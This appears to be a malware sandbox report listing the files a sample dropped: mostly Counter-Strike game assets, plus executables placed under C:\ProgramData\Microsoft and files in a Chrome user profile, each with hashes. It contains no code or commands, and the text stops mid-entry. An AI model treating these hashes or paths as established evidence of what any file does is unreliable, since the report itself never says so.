4488849e1a295ae7b12da606f14dfd1797d6a30b

SHA256
35005356b10fd6a8e13bd8e48e1348993ef3f52b46cbcd3521bb1954a9dab74b

SHA512
37510459d4ca27b36c68ee0efe6046632bcd8edaad5b8ea29c570be4a6ca4c12ef5d8959bb7e581aa8b062f0936ad7035d3d7e07210c02ca815c93d964bbfa13

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\800_arrowright.tga

Filesize
1KB

MD5
f7035af9a5f4f627998433e6a063e76d

SHA1
b36a4047d775b09e72c7d37527fa852733346cab

SHA256
d4edfed0ea573008b33603b16be4dc6da0e08b815f7d78393271b26de4d4e54d

SHA512
8749c185c1417c4b7c9dcc110bcf52fef37710167d58e649819a21e2b546fa2e41b84b1a499af07aa46cbede1bd833b27fed1dda99fdb5e21facccb3c59a9f7e

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\800_arrowup.tga

Filesize
1KB

MD5
9a236bd4e3a85b8039286a780168c290

SHA1
d756c8e3b6c0212fdb8dd9acda8386f11ce32e96

SHA256
7c71e82e5d6a45ffb778def644c0dba8c5e6164b755832c674c3b931f0861d12

SHA512
42b14e028da153eb99c820a5604265fb822673dc1046929675fc29d30d0fa63c8e183bf4760735657e7d0894d45b491ed6103e539912b6ace49c9053795d0695

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\800_timer.tga

Filesize
1KB

MD5
1926ecbcf1b403f0c4a30426ea74276c

SHA1
24d8e0d5f3477f85e76985a0fc579e392482c402

SHA256
99986396ea8ebd9ab4eb1221b52db2a8a024e67c748e0b8080d8dad24e4e9cd2

SHA512
8e944a0304620fb7428acbe883049167c0bc1596d8f294b1ebcb383899e6881c5e54221ea5a60fa7c14210e5cfd91831a8481020608c22747f43c2f9d7e45060

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\1024_Primary Button Text.tga

Filesize
34KB

MD5
46f3cc3d5ca0f0e80d30ec38a3ed9702

SHA1
2b7902e73522c60bb4e5a6d7905f91967ec54b46

SHA256
824ad8824e4d05319556d9c08dd0d4c90fecd6150a0dbcae8c946740cb4e2c56

SHA512
9f85b11a9479af47963155fc823a9390794b3db05fb50011efaa87e1adcf772d18fdc1bd57f3ca556ded84d5fc5671236ee0705043771c83663612cd2b0f16d3

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\1024_Scoreboard Small Text.tga

Filesize
33KB

MD5
bca82506d597eed9b5507ff7ba16567b

SHA1
55ad94cc92b95ce8e2adf62df94a6a8244980e8f

SHA256
4eb392f4136f1a4b255ab26772947e62b80615ca8b1ccea93563c3f33539a8bd

SHA512
e817036968d39d3f86c2f6f241c6f80756bf139a700adf018feb870542331b230cad6369652eb2a26b26e94b14c3e27dc0112d3ccd1c512f73e8b056ddeb12fc

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\1024_Title Font.tga

Filesize
41KB

MD5
277585b15795e85bc33d82eac7c90cb1

SHA1
b05b40e3abf6e64c2f89aefddabc101c00ab63c2

SHA256
2a2d6cade3d2b0de9822efca3812d91af06f7140547b65a7b8eae0c8f9cc4430

SHA512
65970365f78c0261e34c567deae218e752b7535f3828467ae785617201e3194257d89fc91a097989beda2683d1ce347d11c2846e04c74b5c194d50b76bb0e617

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\1152_Title Font.tga

Filesize
50KB

MD5
293f79e66c740942a2d7136b03ba42dd

SHA1
91edc4d29f62f6273762d623f8f91758ad28bb3d

SHA256
7a9f84fe3c6dab5ec161da7acef69e8f09256e3d7abae9c034bccb87000a02f7

SHA512
dc0e7bba7d7767499e26ac183df7dbe4e56ba8be85da7ed8b194edac0a02f7ce3f2f284f781a36c5e674bce6abe54470541b6b3ea57ca6586a76b2069533bfee

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\1280_Primary Button Text.tga

Filesize
40KB

MD5
4ed17a87a346560272c439dd5fc8da67

SHA1
230978ff39d9625424647bcbc8e90756e79cf58d

SHA256
3c0a85646aed020ee61e7286a5c0104a9a1b26a0aacb0c6b977420d5f1d192a2

SHA512
28e3ef3b2ccde25f5ce84d4370aba345162c5ac771ef0c0bc446ab041125f6bea5d042283b28e107962005786862729374e442dfd12b547cdfe58f61d44ad907

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\1280_Scoreboard Small Text.tga

Filesize
40KB

MD5
910e7f920f59348e20f787d9240fe2a7

SHA1
9f85998b0a73efbf34b2e732942a0caada57925d

SHA256
93eba9e5ba94654d73d76944cb9860e4fe8db92a6c734fcbc57864cb766caf1d

SHA512
a19fad5b08875df9f16993d48562cc2cb4bf5d918b5f102b0439c6d6d6fdb862783762d586393b0e0b6c324de3c38c27fbf09d4b48c55affd44aad2c1ee9726d

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\1280_Title Font.tga

Filesize
58KB

MD5
950ce4f2583aab6854f2f3daf43d275a

SHA1
041be03920912db7791d4098a8b3e1d6a8d7bc10

SHA256
8bc1a1698604836ab766fec452e5366774ef3057a74ac373de8bc2a9bbe58b32

SHA512
420d21c295b8aea3f28bfa299fe9f6dfcdb726f0a5b7b024ae379299b86cd229b654d870e826c21b7e095001f98bf646360f6aab5973587f6ddd2d4e2929b933

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\1600_Primary Button Text.tga

Filesize
44KB

MD5
ec8766ea06b999dab276c2ed85397067

SHA1
d043859519210810ab69bc4172406511b0391728

SHA256
dff807e488eee92c3f841de1f330bac00b42c36e34320e6335ed6e5d926243a8

SHA512
5b69d36450816306ba280d2690c65f7478b84a4b1d8eba37b8a4baf8631d767859599e1b20bcabb930dbb7ebbfd07d89bb3336c9999809c50e20fc0661cfb77c

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\1600_Scoreboard Small Text.tga

Filesize
45KB

MD5
d3d6c70dd23590745a0f691c28f88848

SHA1
b46b4a8427c59e590f8adace2ab659da2f4f4e9d

SHA256
f472485bdddb0f7acdce7ba6dfb1520dfdab6b2e870b37f77f61714533c5fe79

SHA512
06a400b5462c9a307bb281cf725358a8bc64a27e34b5f6b95748d3006703e66c4a756ad86fc5e2de9c2a2eba534921234fc2ec422b6107ef7264f7344a258a92

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\1600_Title Font.tga

Filesize
69KB

MD5
a80b9ae2ceb6fd94580f6bc1ee9a24cd

SHA1
69b41ecca064e9528bdabf40ec4e0d398749ca30

SHA256
4741da08d0699272b1db37248f8e4b74d736035bc3df0fb54c19b09da732211c

SHA512
e69cdfd82942421f4eb1ee625d8e8a91216221efa0046e92987134b0f5cf5d6991b51bb11faa94a82cbb8b856bc4a920f53f99a5c31b67e13291fd722ade8431

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\640_Primary Button Text.tga

Filesize
24KB

MD5
ebc1b6a271bf99cdadc78dae5e9a29c4

SHA1
afddb10163d0cacf30f7a2e9f9e4f534c8425586

SHA256
3988ddbea3e6fd927933a698d28d66572d51e59938ea16624f644afe2021818d

SHA512
ccbc9f59f59c46187954d5e8a70513542471a40e8653f59c8d58279777c9c378f2e1891c4949d8d5b104117410e991f756d768932fd5353dfcbdca3c37d6ac1a

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\640_Scoreboard Small Text.tga

Filesize
24KB

MD5
07306c3fa68e4b5bb4fd4da515adfdc1

SHA1
ae0203c50a3ef107992d61f4b135efd6fdc809ba

SHA256
fad8e72511e03ea0b215e491da1ada731d7474a03d43c26a2f858c8fcee9beac

SHA512
d6d1b8f13d9263932f8757fed790dcbcdca681ca51a7581ca552631409b8c65de212436f8e161c60463edf8589067118d15537789e8aead85eeb156af5c29a7a

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\800_Briefing Text.tga

Filesize
27KB

MD5
8148e0f0a6679ced3ca04fd6c258d478

SHA1
9afc1daad5e004bb9481147ec5fac15693897f2c

SHA256
60946960e36a56fe17b02ab7c618e3ca0d61b7412acbb9967271ff309a76b5e0

SHA512
918c03891b46c645ff9b1a497a77bfee752befdbc2e82b882ca3d665dea21d3de1b112848ebb9b996b201c14bc14a70231838eece3df04a431becd0852417bed

Download Submit
C:\Counter-Strike-Original\valve\gfx\vgui\fonts\800_Primary Button Text.tga

Filesize
27KB

MD5
a06ae3f8fe07c419b05e2c803d14997d

SHA1
d88fd662df45404e6874997b58ed98b1e718e844

SHA256
17a5a27301be4a264b6cfa1b663910e158a75693ca032d2b8cfd3d41c66efa24

SHA512
315ec6aa137576b3dc3549bbdf1c4a7c82617fe2c0c7c6bf84297fbe6e2bad3d30ad8ec5588e8b3a0230f360e27779700b40d1934e5debe31c3e280c14c55f62

Download Submit
C:\Counter-Strike-Original\valve\hw\3DfxVoodoo2.cfg

Filesize
1KB

MD5
b1df56c2fa4c6bf5f92393be578ad216

SHA1
d5f78af13490769f5865e2f859bb31d14f5d78c8

SHA256
877ef38f7cb6b18efd7e032dc073901b7fe351a4ed91442b7092e70879155414

SHA512
ed1cefdde7b834b1ec03d120481c86ac6125cfb0428ab409f9a08f119f23ecc1a1bdc17dc62edb45c2e111e03db624fb6842427b5546461305cd069d41ac1675

Download Submit
C:\Counter-Strike-Original\valve\hw\ATIRage128d3d.cfg

Filesize
157B

MD5
1a47243d1e17e287a9fa2d884ba38a03

SHA1
747dd8606f4df04a3ec9809570dc43b206e8ab57

SHA256
dfe8db504b46fb690cfff87234390a93680bb51acacd9e3c4f7929346700286f

SHA512
31646223619ba2af69fbf761e64682ed6e431bbbf7142e321a99dd9b0172fc7419cb47485e9490f8cc753bc6104277bacecae6e8e1626d4c1aedb7c64d72faa5

Download Submit
C:\Counter-Strike-Original\valve\hw\PowerVRSG.cfg

Filesize
1KB

MD5
7c2d910a94700c4bc996be0e7be3d9bb

SHA1
37f28473f1226dcba50edc0b411998817eaa3b16

SHA256
ed1cdf2d0d7d7c1d5e437b552fb792f40c3a48f336eede90088d752af90c7da8

SHA512
bc1dde19236290780f012e2bf44d8972e3b3055b7d41c15934a3ba507c93e93f799badbf137d5ad49083e1823da95a16085538eb190d012c5e373d24e03cd69c

Download Submit
C:\Counter-Strike-Original\valve\hw\opengl.cfg

Filesize
32B

MD5
815488687110fd2650fb723e12ac17b1

SHA1
61bd1b2720de8ee30a0545ec175ca9cac973052e

SHA256
a38ef73f270f04ea4ab1f7c769a873c5b096c2495471c8dfc7714e09f816872a

SHA512
19223a2f7a19e1207ac6465c5b72a41cc1f32e265382df6831dfab4d424142fd3863f1a6a4d68ebdec4f0869ffbb99c416c06e9907d0952af0224eed87100f63

Download Submit
C:\Counter-Strike-Original\valve\logos\chuckskull.bmp

Filesize
5KB

MD5
39c7b460021042a446bd8bdca8476a83

SHA1
c3994ec1879a611093a06237eb22fd07bb1b2bda

SHA256
88bc2cd2dac6482c37132b691e2039dc793da95a1e7a548210682b56b52374c2

SHA512
0f865f28893ec5b0c4bff034a7cff99d4220b44c196c9e44de6530b5f91640892f2e40964c2792ff5f93a92652697ad2a19d427c354324a2945eb78cef4c9c48

Download Submit
C:\Counter-Strike-Original\valve\logos\lambda.bmp

Filesize
5KB

MD5
1876018802412e395418d9abdbc3b062

SHA1
871f13b1b420db932514f77324f79588458c9d41

SHA256
1af36b03a2df6da208575c6a54fa8244f7c7ab8c1ad4b1d2208ef0c28e94715d

SHA512
38fca57b73cb8a666406aa9bf2545438b27e06ab09e9302ef6a3cdbb29bd212f7e16733c5cb30a6cf33163695042dbd7ca54dea1c645977be56d7bc998772db6

Download Submit
C:\Counter-Strike-Original\valve\logos\skull.bmp

Filesize
5KB

MD5
d8e44f63c296926b8a722279d225d4a4

SHA1
04c6b93e729c70768818a755da21c90bc499d525

SHA256
b8471cb9c6a85760cfbf29b814a168a37532e98e125485c3357dff31cfe8bd42

SHA512
98d0122074e0582308e0bc8c5d36a042460c3394218e58907710486cf12769d1047471f7123d54e7e9d4f4178c5d07c1f3dbae255de90f344c5e5e43aedaecf4

Download Submit
C:\Counter-Strike-Original\valve\logos\v_1.bmp

Filesize
5KB

MD5
e5d9acc68bcb1e4114a97a186cc54cf2

SHA1
ead2c585eb34248e2d709082e6ff5cca0b9c2215

SHA256
81cf60e1eed45acb0160374a78f0398e5005e5328e071b4692dcfdbd3175a65b

SHA512
8b946b58a04d54f8f825ff12b8d68a2f7223aa2992236e26812516dd016b74fd830fd5a937e997eda59b243beebd031f6f66bc20cfc4b7fbd1b3cf5d1e14d737

Download Submit
C:\Counter-Strike-Original\valve\models\fungus(small)t.mdl

Filesize
22KB

MD5
5f394d005ec12f63949d0c6a62c1b7b3

SHA1
957d1d0598c7bd0079db345db2006d8e4b755096

SHA256
47b5e88f5cc25627e8dc76b85eb6ad64d8613b00838d0cca6a85f118af81c7b0

SHA512
c51142a1e7902d720154378a7b8e01808fb4683e5a12c77516fa474b4eb05c0d2cc37aaf1b3b0a33757aecdc9ff8008333df66ed0e254b01cb5640b8646e6fb7

Download Submit
C:\Counter-Strike-Original\valve\models\mil_crategibs.mdl

Filesize
56KB

MD5
3b6e8c73f42cf52a73a36271d2b4ab21

SHA1
2735e47314af1914c6fb7d8dab9ed087365ec759

SHA256
a0c1b32de541fefe134335b61c1e9dd4b2af28b8dde35e70e74d129c0fe1dd79

SHA512
384c254eda0c2a2ce618c3ea85946ed2e7b4677e4162a50a1103de05cf8658ad59d85faaa74d8d4896efaa3fe7a470b81af691d0a00fbbf959706d78708ff887

Download Submit
C:\Counter-Strike-Original\valve\models\uplant2t.mdl

Filesize
3KB

MD5
ab9f1bf1f7d14ca0032df954e1dd5212

SHA1
d51ab73cb33e1737b86ea0bf6db28aa895bb86ab

SHA256
748e6fb4465843238519d56774643c2d4fb3f77131ba49ee9ca2d700c42acb70

SHA512
c5dcb61363551755beaa4732a21ec870c9b077a44eb0e810029f056a7c89b7be4d6e2d4e48b860a4eedc707d057ba55b2b45c238cf4a99ec167a1c07686710bb

Download Submit
C:\Counter-Strike-Original\valve\resource\BackgroundLoadingLayout.txt

Filesize
714B

MD5
11136b7cff2358ebf01fb0d8783fa793

SHA1
05f5a267828975d2c43f90b73962b971b9672954

SHA256
f1d2461e3936ab6397a852f4efb971ad807bea0c6c99ca8377886ccd88ada750

SHA512
b8dbb295b7d5a9b5f811d4c63f9dfd6dba232269f5b04c259f817ed7c915bfd12d2df0b71efc2442b40db677f3c16a8c12e8135da7b76dc55a607949599caee4

Download Submit
C:\Counter-Strike-Original\valve\resource\LoadingDialog.res

Filesize
3KB

MD5
0d4c90f34f238015c6eba69126c87901

SHA1
28ec788d7ff2ee62e23bda46e0642a8bbacd890e

SHA256
605a8b9482d6a9797969611bbaede3a965d918be4aa446b0d24e3d1dc9ff1759

SHA512
2194ab260d0e9957f15bfb4fdf49e2d6dd62cb3b94b754d0259717057f8cdaf89fe99a6f334327f2134583a545371a12afa1cb4e6d6ae122ec497187c234774b

Download Submit
C:\Counter-Strike-Original\valve\resource\LoadingDialogNoBanner.res

Filesize
2KB

MD5
41fbd182bb5b5cea2f55b5f1bba6c09d

SHA1
3105c5845a0093c16392502d945aa3b7a846a470

SHA256
727d34d5fdae5f32f75a78baac5d05eeefc6aa094b8cc2138f88874044e74e42

SHA512
69c54056a5408a67273e1a90677a838fd94060a170de09dc61da504a1ef10058603d997441e9271fc8086035deb3e507a6533d125e35d98e911c7fbc32f76301

Download Submit
C:\Counter-Strike-Original\valve\resource\LoadingDialogVAC.res

Filesize
4KB

MD5
5c7fa93d0052dc4bf717a78dfb9f80be

SHA1
4a74852b07eb81f1e73b2208173b35db0f5e7bb1

SHA256
9287af6ea28791e62191b7c2551c3cb2dfefc4972e79c6c410f2474a638c7b5a

SHA512
8cad767202e27e63db644d333d46f0ddcc1eed87d95a712f35a59d84ebcb1f08028aa71494e3fc5db45eb36edfa672d42f145791cf7dd1d3713a1b7c312ee881

Download Submit
C:\Counter-Strike-Original\valve\resource\game_menu_mouseover.tga

Filesize
24KB

MD5
603dbf858b8ccfca88e63a0d284fbbad

SHA1
8a9807bfa7d3c19d4870c408e1973239a5d48506

SHA256
251af645272b8f6c2e7f45cd0d9f4c04f86c385893a63c1a38a8aa6c70503a98

SHA512
ce2e434c4b0c11dcb9c83958b3070a48e1f18d3ba99655ea9d1749627b7928d77e2754b1a9ed5b595ca6c84992a2c82bc51af4fba35dd680b7e8da897d307a0d

Download Submit
C:\Counter-Strike-Original\valve\resource\icon_hlicon1.tga

Filesize
1KB

MD5
7ada900b04c0e3fce5c8fae496637502

SHA1
7e09b372151aa4b05d604d8cd6be5850814e70bc

SHA256
db6edb7e6c775e916a3287e98a1520ae5e3c4ae69650aaf0f036218ee5047204

SHA512
b41ebecb1284b0b2c2f16327d9a570667a64fdd9baa478509319607e5f178bccc1d7d650be7b45a7152bb4d976f126decdfe92d04cce4fee918b3dcc3316e5cd

Download Submit
C:\Counter-Strike-Original\valve\resource\icon_hlicon2.tga

Filesize
1KB

MD5
1810657a6ba98a8ee7934998cc274167

SHA1
d317e6f2c4491f779258f7cf261d62022f2117de

SHA256
bdcd34d7b2d100dc8417c987f4409a3401e0463e43f3527f865fadc52e353ff1

SHA512
9a0aa9eca283b6443385c474658d77430555d626b266d7ea0b41122add04696274170651ec6709ed37c36a99db0b0479f51096a93471909b176abd69d767139e

Download Submit
C:\Counter-Strike-Original\valve\resource\icon_vac.tga

Filesize
16KB

MD5
6b6188262b1412923046c0f18099784f

SHA1
b179ab2f81cc94432a33b7b7f9ea729c7f1d3a4f

SHA256
8d2230289eac31eedb53c68caf115c8f505901d38fa01ace2b3761be4c27351e

SHA512
9dc9240e47c362da458e7047c2a4ac5dee01e8bf116e56ee35d509afa8508d29877639677bf40f10988256ebbd0d18b80815ce21a747a254a79adc93037ea352

Download Submit
C:\Counter-Strike-Original\valve\resource\logo_game.tga

Filesize
64KB

MD5
784470fbf15dd96063d85b801d481e3a

SHA1
7ae39d6510cd2392d0da71d6dc6581ca0c8b1dd2

SHA256
0f5f4eb6936d716b674952b8a25617e6d79111a468404c23f205ce87c5d66f1a

SHA512
7febcabd85368c2f95afffb25110410b88430871ba4b5e88c706cb7bfeec543ac521c43fb2deb70b709f1d9726d42b2c5199757d7cc1e671fd1850ef2ba6f3f0

Download Submit
C:\Counter-Strike-Original\valve\resource\mic_meter_live.tga

Filesize
19KB

MD5
8705ba060c4bf2cf21728a71a910b45c

SHA1
39365c55d7817a06d8551f16e0aabe84dfa1c9f4

SHA256
38e9b353145a885e23443275aeb5250e2533403ddca7761426c683e343ba4eae

SHA512
68bdf3da2b1d6a7b724842630612f81550673c1b8526ecc3134698eae387dc090cd41f21f1fd11f70208c7b22d8815dd82b5cde4ca30a101fab3f81a1f8a3c90

Download Submit
C:\Counter-Strike-Original\valve\sound\ambience\mechwine.wav

Filesize
43KB

MD5
5bfb265b6ec9208a611224fabb35ed11

SHA1
4922ab20587c786b13cbec430d9436f53e0e1360

SHA256
1b0b9f054d82c238128b821c41bdeba0e81a436f37c1aec92d2e1dfd7be61c6a

SHA512
b061fd6408d6b89e5be3f8ba7531ecef3bfafd2f2687617f0fa5bada98cbcf1faa95ae9118383b4e48e5d140c317d244cbea938bcc17cd930199f1243ddef3ff

Download Submit
C:\Counter-Strike-Original\valve\sound\fvox\_comma.wav

Filesize
2KB

MD5
299c3e28a49757ecab2e84ca9b220e62

SHA1
850cbc182e7000b6caa8b6af9986161a2554dbce

SHA256
0ffbcdb3466691fbc1043c69abe50434df646f997c52856a509de43cae501eee

SHA512
2caa0f84686df85905b355107ce2d50c1b8b6debadc50d49327330855e3ed2cea05768c1394cec746ddf90f7087a08ff98eda51272f89d7450923a5e41a13bf8

Download Submit
C:\Counter-Strike-Original\valve\sound\plats\heavystop2.wav

Filesize
15KB

MD5
3f7ce805c3308fe4b6ded87504b32ed9

SHA1
8b51faf5dcb0d65ca9e27a61438d01282c2231f0

SHA256
465c5a7a363a2427efbab3990dfb82361f2309139c5ba4a135210cb3d714924a

SHA512
6d4e5ac1285f2bb87450087d437e49f834ad1078fe27cede7f7bad46b803dfffcb758579d63532e6bc51de74f0f6c120ebfe2d6eb56273c2f17c65cebc2d9d64

Download Submit
C:\Counter-Strike-Original\valve\sound\plats\train1.wav

Filesize
1KB

MD5
811989e09124f54cb27fe6154b0f1018

SHA1
90c22fc3b248588e2d9759e6ef395303a86b7b60

SHA256
5271b9aa2961809f47fadecb693be2eebde2dbed62fbc4f5f4889fcd8c4a65f8

SHA512
560d26fdbec34ab687e40b8be6144b0f586449bd3a0eaf286ab972ad60b1eb1fe002649daacad36039a298ad24aae96e3531404ac2d0d7b0b47e194b8169e18b

Download Submit
C:\Counter-Strike-Original\valve\sound\sentences.txt

Filesize
49KB

MD5
1a5c1dec3290519df29d41caa75926e0

SHA1
008195da6d18f03d7477a22edc4f6596a7b48288

SHA256
f6772a9af4364487053bd2fadf696b27c9d21184b62fb603a2797885b743f3d7

SHA512
7ecb648d724e6d0ef80cbb0e2628ca0f9f31e82bd5c0f2b441b13843c599cefbfb04d611f2511730afa9122dc5dd52ad281248eba385647d1eb63208c1d2e9bd

Download Submit
C:\Counter-Strike-Original\valve\sound\vox\_period.wav

Filesize
4KB

MD5
076816713017d707a76164e7e473dc45

SHA1
65dafec97b5677bb38641d1c42fb49416a22129f

SHA256
0e8c2b05fe4e00ed75f3ff0bc27f2feb80f242fedaefab18761f4e0d87909767

SHA512
fcbb44367ba7ad3ef9e90643c04375fa8c202441a97c3115bc4959a117c38868d9fba80f480bd5a9d9483c6d480c45b577b858862e7bfff188800bd6cacf0d7e

Download Submit
C:\Counter-Strike-Original\valve\sprites\logo.spr

Filesize
361KB

MD5
4a972be4bd6a377a7aa87189c3306b49

SHA1
94d2e6e78d5be777b7744e4b3ef1bc5ea7498751

SHA256
a2136f96a42941d2a37a95762b1eff7f2680d73ee92ae8bdf6db46b89f2a5834

SHA512
75c32d4a9144e62aef79c71926b78af966e9263c1f94511a41cb2f397ae608b0770a506b1b1d565a924debd8ba3af6975d8a357efc087d7d04291cfadbc2c68b

Download Submit
C:\Counter-Strike-Original\valve\sprites\muzzleflash3.spr

Filesize
4KB

MD5
aeeefbc9a93f875139c647fa0cc5963f

SHA1
1bbf1c85689cc1742fd71cec96f4ae6af3576d82

SHA256
88c15af4711e34e6f456bbe0056ffebeedce84749b593efb3a472af8a637db0c

SHA512
a354d04d946a4e54f3a52c1a5c50090956a939a6cc9ec81f76d7a3d69726c216815e0330e75d8f3d84fdf3f051fd7b9cd9596f730190ee760e7c5a24f5d29daa

Download Submit
C:\Counter-Strike-Original\valve\sprites\small_logo.spr

Filesize
88KB

MD5
27dc6519e03db41adebe095175cbe6af

SHA1
57ef15841c76fa6e9a14445e0f9fc741dbc54611

SHA256
52ce578669f260926eba402b70f0b15f5bc868aeb3289d30f5bd1c22e2716fec

SHA512
33b788488e11c03cb9867aab24fcf3ceabc49704af33d67f29c5766aa85c74c1b78da4ec00a1f8a164261d696bbeaa97bc99fe46b33ab8b4f84a426fde2cfcbb

Download Submit
C:\Counter-Strike-Original\valve\sprites\spotlight03.spr

Filesize
4KB

MD5
30c0c19f5c5226225ac3959dfe1f1428

SHA1
5c7be5173586da26dd730a790a151b8a16611106

SHA256
5603d52c5f089950f372e2b00845738746abebaa2796b0b3e2f6d8d2f4111760

SHA512
c71799d84798c2e2a82dbde7ffa5a2c8698eaac615e77d337de7dafc9239c4b59bc2794b2ccd5740d3e19957549257bcd468660d0696f09fdca37485150c233b

Download Submit
C:\Counter-Strike-Original\valve\sprites\streak.spr

Filesize
4KB

MD5
aecc5ae7744a57ebf4be72800f4afc99

SHA1
ef85d3edc6e67effe4bb05e2f6402fcc06434c50

SHA256
0de493642bbd888f1b7a2df91150cf0958e60f36265e10d994533f3020dc8cec

SHA512
fe9cb6bf4bcc06e4f22396c1e1fd8a8ec6abf71e2bcd93acce2fbd0382beaa78b08d211a1136780052f18b9869240a50344860e8885c2a7d23999da6b3ee396b

Download Submit
C:\Counter-Strike-Original\valve\tempdecal.wad

Filesize
6KB

MD5
78583230916aff438e22cff1d2076195

SHA1
231921e8110d445ddc16c55f5154e6b000485fce

SHA256
96e8bb7a3317b776895d4f12a230bfa169988a0690bec9841a98cebfb170c9e8

SHA512
d6c39146fc8daecd2ff7574f6b1e72cf9533c09350e932b1312cea7419aec9ee209ff4fa8856651a783ab2d7ed09edfbf91e321c5399eca9e96f0b15cb2f20d5

Download Submit
C:\Counter-Strike-Original\valve\valve.rc

Filesize
9B

MD5
dbaf9ba30f7bfe8c40a14227370aaa31

SHA1
f2b692279c277712ab8e6b9a437e11ac277012cb

SHA256
463b8401448651a6b882afab9172990a4339110a2a0e79d9841670ec6a8703b9

SHA512
75b6800b376c890504551d24a7f5f8a41357d5b7a9063e17a9fff01504bede5e6dd2d0b3579a6eedf994beefb0a1145a25e3a1488c7494f6483d1ef0428e5aa9

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
5.4MB

MD5
1274cbcd6329098f79a3be6d76ab8b97

SHA1
53c870d62dcd6154052445dc03888cdc6cffd370

SHA256
bbe5544c408a6eb95dd9980c61a63c4ebc8ccbeecade4de4fae8332361e27278

SHA512
a0febbd4915791d3c32531fb3cf177ee288dd80ce1c8a1e71fa9ad59a4ebddeef69b6be7f3d19e687b96dc59c8a8fa80afff8378a71431c3133f361b28e0d967

Download Submit
C:\ProgramData\Microsoft\based.exe

Filesize
5.8MB

MD5
8b8923196d79dbc485829e8ba4a5c2ef

SHA1
64b92ae8299fdfb42dfb585bc9143535d9987e8f

SHA256
d11569db7b204adf493dd7a08584debf1e1680c2b795a0d40b0dfad17c800788

SHA512
c2da06e3b6aabde161b65fd7529fb6182074080aec93960e8811f45cac2f3cdfc0b3bc806d6b8fee285101db1a79566ff3ed30404a9189907ff00c3b76a2ed72

Download Submit
C:\ProgramData\Microsoft\hacn.exe

Filesize
24.0MB

MD5
70d8f32540470db5df9d39deed7bd6cb

SHA1
a14147440736d4f1427193cd206f519890b9f2f2

SHA256
858bdc7b94a957a182492a2d21e096b2fb2ab5317ae9e3e882243ad80953227e

SHA512
522fc6bc180c5e9e7bc60ece7404162692f0a7902923465082cf5449bc9d2f247b8e7d60f7f0bf5a24bf98fc07826b743a49b71eba406f6073990c3355944870

Download Submit
C:\ProgramData\шева.txt

Filesize
14B

MD5
1207bc197a1ebd72a77f1a771cad9e52

SHA1
8ed121ff66d407150d7390b9276fe690dd213b27

SHA256
260658b9cb063d6ce96f681b18704e02fae7bf8fc995fc249ab0be1400983476

SHA512
d037cfa3b6e6ced9652b2c781bb54cf48dbaa0aaff05039ae4fd0122749eda472807d4198981aa6ceffeba6d2b23d7ad08d7d96983dbd8539cf6b07e46e157f4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
e1d51c3b3962b985b0ec48bb9b7a19d0

SHA1
fd14a811fc2add7f2309eb78d031fc03773c7752

SHA256
8accbe9aad4d3ca4dadb582563f7997a5577cb18989259a93ed3ccdf0b986f2d

SHA512
cb2c05baff83f75f93ab77855810f4d9495a307d2d7ac70086a12db938b9bfc111537f13002649b9e05eabbdc4b5c43489974c92b3ceab9ac52171877f470f8a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
a4a0b6a8f435975bb1ad7892394496f5

SHA1
4d4121031840347e44b57a865e3bac49f0174425

SHA256
c3cc44a05cf87a187d6b9aac4cf5b0c65c77da08acabf799cca4a288a0f8190e

SHA512
13661a6739a931dae8201c94679651f0c9d44a275086dc060f64ab9575e66969f8ec94f7890f73d5164294e84d74fc903b1a18fbb5637be996fc9161b90e936d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
7eb92eb6b7fb24e545c82d191f4095ca

SHA1
80f25b294f3e0d71dfb0ce2d54ff67a789d465e6

SHA256
b1e45d968a75ddbeabf5380687433fe517143fef950168d9f925f6d80c5ca664

SHA512
345734777c3eac223eb2f01685e3d39610fc8efde44f8980a0e9f5b125cc5cc2d5b762b5a3c699fa270001ba98a6f58577ec44fe4d6269b835191d3e2cab334a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
e61a5e360a43a74a08b41c51830c4c83

SHA1
de31cc18ffbffa20db4975d40f07bd6d37a2e811

SHA256
a8af100deb2a99660bcc9ab663744b17d585066c093a688c5630cad83fcfe7e3

SHA512
31f4012116d7f4a5afdb1f9d7459af7c4dc47c9dd395d41838c46c8a8a02cc28602aea8ebb99820c80b61037f750c80ccfcc2ca5eb1f4885dfa22d210566f0c8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
a9b81c658719309618b5c1a39e10c148

SHA1
04d85574054b960222246afac0f770723a22d005

SHA256
4cc944055fe3ccdae953c84cd1bbf3e30d1dd7c13887827f2bfe8f0db89a8493

SHA512
5b4bb64ad2358c4c2ad6a78c07544af6cb4431c0e4acf6876f66f0484ad3f212c10f1c2d4fa24ec9c5386a211faabdb79894e069c61102fdfe3235fbaea0f3c8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
9e54df954fdaef329fabb9639560615f

SHA1
7f42d66244ff03d39473417b700022df05f0a385

SHA256
3ff92c434c2ce46f8d1db20ef8ce5bbce1b67adc6312d408ae970675fcabe661

SHA512
